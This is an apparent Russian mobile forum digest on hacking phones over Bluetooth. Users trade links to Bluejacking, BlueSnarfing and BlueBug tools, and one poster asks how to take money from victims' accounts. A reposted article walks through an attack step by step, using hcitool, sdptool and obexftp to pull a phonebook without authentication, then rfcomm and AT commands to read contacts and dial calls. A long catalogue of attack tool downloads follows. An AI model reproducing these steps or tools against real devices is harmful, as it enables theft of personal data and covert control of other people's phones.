Конференция W Mobile Дайджест

 ;) Парень явно не простой, наш любимый друг Седой.
Господа, читайте ссылки и изучайте данный вопрос, но не взломов ради, а безопасности для ;D.
Помните: Предупреждён - значит вооружён!

 :o Вещь! Будем пробовать! >:( Буду чинить зло! ;D

Ну как, каковы результаты?

ZloY думаешь кто нибудь признается :)
Если молчит, значит - творит!

У меня Asus A686n wm 5.0 у меня встроенная функция просмотра, удаления и изъятия файлов единственное что у меня не получается-это снять деньги со счёта. Если у меня отображается новое устройство то пишет все его BT-функции. Можно ли найти модуль улучшения к этой программе?

Уважаемый, FreeLancer к сожелению программа Тeрминaл, она же The Real Bluejack, версии 1.0 была выпущена в конце 2006 года, обновлений автор пока не делал, но вы всегда можете обратиться к нему за помощью на его сайте - _http://www.wm-soft.com/rus, страница программы - _http://www.wm-soft.com/rus_products/terminal
;)

Приветствую. Поставил я эту прогу под ось WM 2003, но вот беда не запускается она...Кто знает в чем проблема отпишите.

Для работы Программы необходим Bluetooth стек от Microsoft и .NET Compact Framework 2.0

Вот ссылка сия чуда: http://download.microsoft.com/download/0/7/2/0728de3a-fa75-413f-b3b6-8050518cef86/NETCFSetupv2.msi

Заранее отвечу на этот вопрос во избежание флуда на форуме:
33 мега вшиваются в винду, чтобы разрабы могли использовать эти компоненты для новых прог для КПК. В кпк используются уже скомпилированные функции, место они занимают мало, по сравнению с любыми другими для разработки приложений, которые нужны разрабам.

Спасибо Вам. У меня есть еще один вопрос, а что если у меня Bluetooth-стек не от Microsoft, а другой Bluetooth-стэк от Widcomm версии 1.0? Есть ли выход? У меня HP h6340...

К этим драйверам никаких претензий нет, тем более что они оснащены отличным «мастером» настройки служб Bluetooth!, но почти все проги реально работают только с MS-ким стеком, можно попробовать обновление Widcomm, проследуйте на сайт Broadcom: http://www.broadcom.com/ Если поможет, отпишитесь ;)

Вот ответ:
Разница в том, что Broadcom (она же бывшая Widcomm) поддерживает гораздо больше различных сетевых сервисов, чем Microsoft. Но у Microsoft гораздо большее преимущество - это то, что на нём работает прекраснейшая программа Терминал.  Может в последних драйверах и исправлена эта проблема у Broadcom, ищите обновления, либо сносите Widcomm и ставьте Bluetooth-стек от Microsoft! Удачи!

Скачал я это обновление...установить не получается. Выдает ошибку что не найдено блю тус оборудование...Я думаю пора уже забить на это прогу :)
robot а как стек от Windows поставить?

Да шутка это была, поможет только смена железа(покупка нового) ;D

Вот рыскал по Рунету и наткнулся я случайно на программу проникновения на чужой мобильный телефон или смартфон через Bluetooth написанную на JAVA.

Возможные действия:

• - чтение сообщений
• - чтение записной книжки
• - изменение profile
• - изменение Sound
• - восстановление заводских установок
• - перезагрузка телефона
• и т.д.

Размер: 101Kb(zip)
Примечания:
1. При сопряжении устройств используйте код 0000
2. При запуске на смартфонах не забудьте включить bluetooth перед запуском приложения
Вот ссылочка: здесь (http://swapfile.ru/files/11376111615214964/Super_Bluetooth_Hack.rar)

Отличная идея robot. Народ! Если у кого завалялись в закромах, какие либо проги выкладывайте!

А может раздел открыть? Вот на подобе этого:
http://www.forum.w-mobile.ru/index.php/topic,28.0.html
Народ туда программы бы заливал!

полскажите плз! какие есть проги для ноутбука чтобы телефон(смартфон, коммуникатор) хакнуть???

Не искал для ноута, не знаю, пошарь по инету!
Вот примеры (ссылки прям на гуглю):

• Bluejacking (http://www.google.ru/search?aq=-1&oq=&complete=1&hl=ru&newwindow=1&q=Bluejacking+download&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=) - bluetooth-спам
• Bluesnarfing (http://www.google.ru/search?aq=-1&oq=&complete=1&hl=ru&newwindow=1&q=Bluesnarfing+download&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=) - более злонамеренный вариант первой атаки. Сможешь не только "увидеть" устройство-жертву со своего терминала, но и получить доступ к файлам, хранящимся на пользовательском устройстве.
• Bluebugging (http://www.google.ru/search?aq=-1&oq=&complete=1&hl=ru&newwindow=1&q=Bluebugging+download&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=) - наиболее опасный вариант воздействия. Если сможешь обнаружить в пределе доступности связи включенное устройство, то при помощи системных кодов ряда bluetooth-реализаций осуществишь несанкционированную передачу данных или скрыто осуществишь телефонные звонки (если данное устройство является телефоном).

Удачи bugai! Найдёшь, скинь пжл. сюды ;)

вот некоторая интересная инфа по хакингу ВТ девайсов.

Bluetooth секурити: тест на прочность


Отбросив историю создания Bluetooth и технические подробности работы, перейду сразу к делу.
Данная статья предполагает наличие у читателя опыта работы с Linux и знания (хотя бы поверхностные) Bluetooth стека.
В прессе всё чаще и чаще стали появляться статьи о недостаточной защищённости Bluetooth соединений и возможностях атак как на сам стек, так и на устройства, на которых он (стек) установлен. В этой небольшой статье я попытаюсь показать как можно реализовать атаку на самые уязвимые модели сотовых телефонов (по данным www.thebunker.net ), а именно Nokia 6310i и Sony Ericsson T610.
Специалисты в области безопасности выделяют несколько типов ошибок в работе Bluetooth, например такие:
• Неправильная обработка длинны пакета OBEX
• Ошибка в проверки целостности пакета OBEX
• Возможность осуществления DoS
• Существует возможность работать с определённым сервисом напрямую (в отдельных устройствах)
• Поддержка работы с AT-командами
На основе этих ошибок существует несколько типов атак, но лично я хочу выделить две: BlueBug и BlueSnarfing.
BlueBug – позволяет получить доступ к выполнению: AT- команд, чтению/записи SMS, чтению/редактированию телефонной книги.
BlueSnarfing – позволяет выкачивать любые данные с устройства начиная от календаря до мультимедийных файлов и есесено управлять телефонной книгой (для сотовых).



Скальпелем по “зубам”.
Для реализации атаки всего лишь необходимо напрямую обратиться к необходимой службе (см. рисунок), а ошибки в реализации протокола приведут к выполнению наших команд на уязвимом устройстве. Попробуем настроить взаимодействие с OBEX и интерпретатором AT-команд в обход системы аутентификации:

\ ищем активные устройства
[root@localhost /]# hcitool scan
Scanning ...
00:0E:07:27:9B:09 Darklight<t610(bj)

\ просматриваем открытые сервисы
[root@localhost /]# sdptool browse 00:0E:07:27:9B:09
Browsing 00:0E:07:27:9B:09
...
\ А вот и сервис передачи/приёма файлов
Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 10
............................................................
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100
.............................................................
Service Name: OBEX Basic Imaging
Service RecHandle: 0x1000b
Service Class ID List:
"" (0x111b)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Profile Descriptor List:
"" (0x111a)
Version: 0x0100
............................................................

\ подключаемся к открытому 10-ому каналу и скачиваем файл…… допустим……. телефонной книги
[root@localhost /]# obexftp -b 00:0E:07:27:9B:09 -B 10 -g telecom/pb.vcf
Browsing 00:0E:07:27:9B:09
Channel: 7
No custom transport
Connecting...bt: 1
done
Receiving
telecom/pb.vcf.../done
Disconnecting...done

Вот и вся атака

Теперь попытаемся получить доступ к выполнению АТ-команд, для этого воспользуемся программой rfcomm для управления пакетами в данном протоколе. Здесь мы попытаемся подключится к параллельному порту сотового.

[root@localhost /]# hcitool scan
Scanning ...
00:63:59:56:3C:F4 Darklight<Nokia 6310i>

\ закрепляем мобильный за rfcomm0 портом
[root@localhost /]# rfcomm bind /dev/rfcomm0 00:63:59:56:3C:F4

\ далее при помощи программы Gnokii или напрямую вводя AT-команды управляем сотовым
[root@localhost /]# cu -l rfcomm0 -s 9600
Connected.
[ATE1]

OK
ATI
Nokia

OK
AT+CPBS?
+CPBS: "SM",0,100

OK
AT+CPBR=?
+CPBR: (1-100),48,18

OK
ATDT+ телефонный номер для набора
OK


Набор софта для bluetooth хакинга

Blooover
Платформа: Телефоны с поддержкой J2ME (с поддержкой MIDP 2.0 и JSR-82 (Bluetooth API))
Download
http://trifinite.org/Downloads/Blooover.jar (http://trifinite.org/Downloads/Blooover.jar)

Blooover J2ME утилита аудита Bluetooth на сотовых телефонах. Позволяет обнаруживать уязвимые телефоны и скачивать из них персональную информацию.
PS: Blooover theme for Series60 phones
Download
http://trifinite.org/Downloads/Blooover_theme.sis (http://trifinite.org/Downloads/Blooover_theme.sis)

BlueZ
Платформа: Linux
Cтек протокола Bluetooth для Linux, разработан в Qualcomm и включён в ядро Linux начиная с версии 2.4.18, но необходима доустановка данного пакета библиотек и утилит. К bluetooth hack'у относится тем, что основные атаки реализуются стандартными средствами.
Данный пакет включает следующие утилиты:
hcitool - сканер Bluetooth (с интерфейсом командной строки), позволяет обнаруживать все устройства, находящееся в открытом режиме. Справку (man) по hcitool можно найти здесь
l2ping - Bluetooth-версия команды "ping"
l2test - утилита для тестирования устройств
hcidump - пакетный снифер, bluetooth-версия утилиты tcpdump
также содержит демоны - hcid, hciemud и конфигурационную утилиту hciconfig
Download
http://x25.com.ru/tools/bt/bluez-1.1.tar.gz (http://x25.com.ru/tools/bt/bluez-1.1.tar.gz)

Bluesniff
Платформа: Linux
Сканер Bluetooth устройств, может работать в двух режимах:
1. Normal Scan - обнаружение только видимых устройств
2. Brute Force Scan - осуществляет перебор по МАС адресам с помошью утилиты redfang и выводит результаты в более понятном формате.
Download
http://www.25.net.ru/tools/bt/bluesniff.tar.gz (http://www.25.net.ru/tools/bt/bluesniff.tar.gz)

Car Whisperer
Платформа: Linux
Небольшое и удобное приложение позволяет принимать и передавать звук на чужие Bluetooth-гарнитуры.
Download
http://www.25.net.ru/tools/bt/carwhisperer-0.1.tar.gz (http://www.25.net.ru/tools/bt/carwhisperer-0.1.tar.gz)

HeloMoto
Платформа: Linux
Позволяет извлекать приватную информацию через bluetooth из ранних моделей телефонов Motorola V-Series.
Работает только со стеком BlueZ.
Download
http://www.25.net.ru/tools/bt/helomoto.tgz (http://www.25.net.ru/tools/bt/helomoto.tgz)

BT Audit
Платформа: Linux
Программа для security-аудита bluetooth устройств.
Download
http://www.25.net.ru/tools/bt/bt_audit-0.1.tar.gz (http://www.25.net.ru/tools/bt/bt_audit-0.1.tar.gz)

BT-Devices Viewer
Версия: 0.16a
Платформа: Windows
BT-Devices Viewer - это программа для ведения журнала найденных с помощью Bluetooth-модуля компьютера устройств с подробной информацией о каждом из них: имя, уникальный MAC-адрес, время нахождения, класс устройства. А главное, программа показывает, какое именно устройство найдено! То есть, не только имя, которое можно изменить на что угодно, а ещё и модель устройства! Теперь такие изощрённые программы как BTClass для PalmOS не скроют истинной сущности Bluetooth телефона, КПК или другого устройства.
Download
http://bluejack.ru/files/windows/BTDevView/BTDevices_0_17a.rar (http://bluejack.ru/files/windows/BTDevView/BTDevices_0_17a.rar)

BlueScanner
Платформа: Windows
Еще один сканер. Так же выводит подробную информацию о найденных устройствах: тип устройства, модель и т.д., плюс список доступных сервисов.
Download
http://www.25.net.ru/tools/bt/BlueScannerSetup_1_1_1_0.zip (http://www.25.net.ru/tools/bt/BlueScannerSetup_1_1_1_0.zip)

BlueSweep
Платформа: Windows
И еще один сканер. Делает тоже что и два предыдущих, плюс должен еще поидее делать аудит уязвимостей устройства.
Download
http://www.airmagnet.com/products/assets/AirMagnet_BlueSweep_Setup.exe (http://www.airmagnet.com/products/assets/AirMagnet_BlueSweep_Setup.exe)

Blooover II
Платформа: Телефоны с поддержкой J2ME (с поддержкой MIDP 2.0 и JSR-82 (Bluetooth API))
Download
http://trifinite.org/Downloads/Blooover2.jar (http://trifinite.org/Downloads/Blooover2.jar)
http://trifinite.org/Downloads/Blooover2b.jar (http://trifinite.org/Downloads/Blooover2b.jar)

Btscanner 2.1
Платформа: Linux
btscanner - инструмент, разработанный специально для того, чтобы извлечь как можно больше информации о Bluetooth устройстве до процесса соединения. Детальные информационный экран извлекает информацию из HCI и SDP и поддерживает открытое подключение для контроля RSSI.
btscanner основан на BlueZ Bluetooth стеке (недавно включённый в ядро Linux) и BlueZ пакете сервисных программ .
btscanner также содержит полный листинг IEEE OUI номеров и таблицу поиска классов. При использовании информации, собранной из этих источников, возможно делать выводы относительно типа Bluetooth устройства.

Вторая версия известной утилиты для взлома сотовых, Blooover. Теперь кроме атаки BlueBug включает реализацию атаки HeloMoto, BlueSnarf и возможность посылать malformed объекты через OBEX.
Download
http://www.25.net.ru/tools/bt/btscanner-2.1.tar.bz2 (http://www.25.net.ru/tools/bt/btscanner-2.1.tar.bz2)

BTScanner for XP
Платформа: Windows
Версия btscanner для Windows XP. Для запуска необходимы bluecove libraries (JSR-82 Bluetooth API for Java) и сама Java.
Download
http://www.25.net.ru/tools/bt/btscanner_1_0_0.zip (http://www.25.net.ru/tools/bt/btscanner_1_0_0.zip)

BlueDiving
Платформа: Linux
Универсальный набор bluetooth-хакера! Утилита из серии "all in one". Реализует все известные на сегодняшний день атаки на блутус устройства: BlueBug, bluesnarf, bluesnarf++, bluesmack, спуфинг mac-адреса, etc.
Работает со стеком BlueZ.
[Bluediving 0.3]
http://www.25.net.ru/tools/bt/bluediving-0.3.tgz (http://www.25.net.ru/tools/bt/bluediving-0.3.tgz)
[Bluediving 0.5]
http://www.25.net.ru/tools/bt/bluediving-0.5.tgz.gz (http://www.25.net.ru/tools/bt/bluediving-0.5.tgz.gz)
PSM scan V 0.3
Платформа: Linux
Очень простой инструмент, чтобы просмотреть все L2CAP PSMs, чтобы найти открытый PSMs (которые не перечислены в SDP базе данных), эту программу можно называть bluetooth сканером портов
Download
http://www.betaversion.net/btdsd/psm_scan.tar.gz (http://www.betaversion.net/btdsd/psm_scan.tar.gz)
Redfang - The Bluetooth Hunter
Платформа: Linux
Redfang v2.5 - усовершенствованная версия, способная находит неподдающиеся обнаружению Bluetooth устройства путём подбора последних шести байт адреса устройства и выполнять функцию read_remote_name (). Эта новая версия с улучшенным программным кодом перечисляет сервисную информацию и поддерживает многопользовательский режим и способна поддерживать высокую скорость в передаче при этом режиме (максимальный теоретический предел 127 USB устройства). Этот выпуск Redfang был создан в сотрудничестве с QinetiQ, как часть их работы в DTI Next Wave Technologies project FORWARD.
Download
http://www.atstake.com/research/tools/info...fang.2.5.tar.gz  (http://www.atstake.com/research/tools/info...fang.2.5.tar.gz)

Софт под Nokia 770 tablet PC


HeloMoto-Maemo
http://trifinite.org/Downloads/helomoto-maemo.tgz (http://trifinite.org/Downloads/helomoto-maemo.tgz)

BlueSerial-Maemo
http://trifinite.org/Downloads/blueserial-maemo.tgz (http://trifinite.org/Downloads/blueserial-maemo.tgz)

BlueZObex-Maemo
http://trifinite.org/Downloads/bluez-obex-maemo.tgz (http://trifinite.org/Downloads/bluez-obex-maemo.tgz)

Gnokii-Maemo
http://trifinite.org/Downloads/gnokii-0.6.9-maemo.tgz (http://trifinite.org/Downloads/gnokii-0.6.9-maemo.tgz)


От себя хочу сказать ОГРОМНОЕ СПАСИБО за предоставленную информацию сайту http://x25.com.ru (http://x25.com.ru)

скиньте пожалуйста мне на jubrail@mail.ru программу для телефона Nokia 7390 для того чтобы взламывать другие телефоны через BT. кто скинет с тем сочтемся!!!!!!!!!!! :)

М-дя, смотрю в книгу и вижу фигу :-))